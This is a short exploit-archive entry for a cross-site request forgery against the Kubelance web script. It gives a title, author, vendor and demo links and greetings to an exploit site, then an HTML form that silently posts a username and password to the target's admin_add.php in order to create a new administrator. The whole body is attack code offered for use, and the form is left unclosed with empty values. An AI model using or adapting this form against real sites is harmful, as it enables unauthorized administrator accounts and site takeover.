# Exploit Title: Kubelance CSRF (add new admin) # Author: Jonturk75 # Vendor or Software Link: http://www.scripts.com/viewscript/kubelance/21881/ # Category:: webapps # Demo : http://demos.kubelabs.com/kubelance/adm # Greetz: Inj3ct0r Exploit DataBase 1337day.com <form name="form1" method="post" action="target.com/[PATH]/admin_add.php"> <input type="hidden" value="" style="width: 60%;" id="username" class="textbox" name="username"/></td> <input type="hidden" value="" style="width: 60%;" id="password" class="textbox" name="password"/></td> <input type="submit" value="Submit" class="button" name="Submit"/>